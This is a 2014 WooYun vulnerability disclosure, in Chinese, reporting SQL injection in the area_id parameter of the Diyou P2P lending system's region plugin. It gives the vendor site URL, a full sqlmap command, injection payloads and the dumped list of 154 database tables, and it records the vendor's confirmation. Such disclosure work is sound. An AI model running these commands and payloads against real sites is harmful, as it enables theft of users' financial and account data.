帝友P2P借贷系统SQL注入通杀#1 | wooyun-2014-060772

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2014-060772

漏洞标题：

帝友P2P借贷系统SQL注入通杀#1

漏洞详情

披露状态：

2014-05-15：细节已通知厂商并且等待厂商处理中
2014-05-16：厂商已经确认，细节仅向厂商公开
2014-05-19：细节向第三方安全合作伙伴开放
2014-07-10：细节向核心白帽子及相关领域专家公开
2014-07-20：细节向普通白帽子公开
2014-07-30：细节向实习白帽子公开
2014-08-13：细节向公众公开

简要描述：

=。=

详细说明：

模块：省市信息联动插件（通杀V4.0,3.1）
基于后台读数据库出数据的省市信息联动插件，省市区变量直接转int即可！
Location:./?plugins&q=areas&area_id=174
http://www.diyou.cc/?plugins&q=areas&area_id=174
GET参数area_id未有效过滤导致存在注入
通知存在注入点，未做进一步测试，赶紧赶紧赶紧修复！

python sqlmap.py -u "http://www.diyou.cc/?plugins&q=areas&area_id=174" -p "area_id" --batch --dbs --tables -D www.diyou.cc
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: area_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: plugins&q=areas&area_id=174 AND 8880=8880
    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7161706171,0x4e736851515370696e6d,0x7167616671),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: plugins&q=areas&area_id=174 AND SLEEP(5)
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] www.diyou.cc
Database: www.diyou.cc
[154 tables]
+-----------------------------+
| diyou_account               |
| diyou_account_balance       |
| diyou_account_bank          |
| diyou_account_cash          |
| diyou_account_fee           |
| diyou_account_fee_type      |
| diyou_account_log           |
| diyou_account_payment       |
| diyou_account_recharge      |
| diyou_account_users         |
| diyou_account_users_bank    |
| diyou_account_web           |
| diyou_approve               |
| diyou_approve_edu           |
| diyou_approve_edu_id5       |
| diyou_approve_id5           |
| diyou_approve_realname      |
| diyou_approve_sms           |
| diyou_approve_smslog        |
| diyou_approve_video         |
| diyou_areas                 |
| diyou_articles              |
| diyou_articles_pages        |
| diyou_articles_type         |
| diyou_attestations          |
| diyou_attestations_type     |
| diyou_attestations_user     |
| diyou_borrow                |
| diyou_borrow_activity       |
| diyou_borrow_amount         |
| diyou_borrow_amount_apply   |
| diyou_borrow_amount_log     |
| diyou_borrow_amount_type    |
| diyou_borrow_apply          |
| diyou_borrow_auto           |
| diyou_borrow_autolog        |
| diyou_borrow_care           |
| diyou_borrow_change         |
| diyou_borrow_count          |
| diyou_borrow_count_log      |
| diyou_borrow_credit         |
| diyou_borrow_fee            |
| diyou_borrow_fee_loan       |
| diyou_borrow_fee_log        |
| diyou_borrow_fee_type       |
| diyou_borrow_flag           |
| diyou_borrow_frost          |
| diyou_borrow_newtype        |
| diyou_borrow_preview        |
| diyou_borrow_recover        |
| diyou_borrow_repay          |
| diyou_borrow_roam           |
| diyou_borrow_style          |
| diyou_borrow_tender         |
| diyou_borrow_tender_auto    |
| diyou_borrow_tender_autolog |
| diyou_borrow_tender_web     |
| diyou_borrow_type           |
| diyou_borrow_verify         |
| diyou_borrow_vouch          |
| diyou_borrow_vouch_recover  |
| diyou_borrow_vouch_repay    |
| diyou_comment               |
| diyou_comments              |
| diyou_credit                |
| diyou_credit_class          |
| diyou_credit_log            |
| diyou_credit_rank           |
| diyou_credit_type           |
| diyou_dw_activity_review    |
| diyou_email                 |
| diyou_email_log             |
| diyou_email_port            |
| diyou_email_sendlog         |
| diyou_group                 |
| diyou_group_articles        |
| diyou_group_comments        |
| diyou_group_log             |
| diyou_group_member          |
| diyou_group_type            |
| diyou_linkages              |
| diyou_linkages_class        |
| diyou_linkages_type         |
| diyou_links                 |
| diyou_links_type            |
| diyou_message               |
| diyou_message_receive       |
| diyou_modules               |
| diyou_phone                 |
| diyou_phone_log             |
| diyou_phone_port            |
| diyou_phone_smslog          |
| diyou_rating_assets         |
| diyou_rating_company        |
| diyou_rating_contact        |
| diyou_rating_educations     |
| diyou_rating_finance        |
| diyou_rating_houses         |
| diyou_rating_info           |
| diyou_rating_job            |
| diyou_remind                |
| diyou_remind_log            |
| diyou_remind_type           |
| diyou_remind_user           |
| diyou_scrollpic             |
| diyou_scrollpic_type        |
| diyou_site                  |
| diyou_site_menu             |
| diyou_sms_type              |
| diyou_spread_add            |
| diyou_spread_log            |
| diyou_spreads_log           |
| diyou_spreads_set           |
| diyou_spreads_users         |
| diyou_sysauto_auto          |
| diyou_sysauto_log           |
| diyou_system                |
| diyou_system_type           |
| diyou_trust                 |
| diyou_trust_borrow          |
| diyou_trust_cash            |
| diyou_trust_gopay           |
| diyou_trust_ips             |
| diyou_trust_recharge        |
| diyou_trust_repay           |
| diyou_trust_tender          |
| diyou_ucenter               |
| diyou_ucenter_set           |
| diyou_users                 |
| diyou_users_admin           |
| diyou_users_admin_login     |
| diyou_users_admin_type      |
| diyou_users_adminlog        |
| diyou_users_care            |
| diyou_users_care_user       |
| diyou_users_email           |
| diyou_users_email_log       |
| diyou_users_examines        |
| diyou_users_friends         |
| diyou_users_friends_invite  |
| diyou_users_friends_type    |
| diyou_users_info            |
| diyou_users_log             |
| diyou_users_qq              |
| diyou_users_rebut           |
| diyou_users_reglog          |
| diyou_users_return_log      |
| diyou_users_set             |
| diyou_users_sina            |
| diyou_users_type            |
| diyou_users_upfiles         |
| diyou_users_vip             |
| diyou_users_viplog          |
| diyou_users_visit           |
+-----------------------------+

漏洞证明：

修复方案：

有效过滤

版权声明：转载请注明来源秋风@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2014-05-16 01:34

厂商回复：

谢谢，已经交与安全部门解决。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源秋风@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 秋风@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源秋风@乌云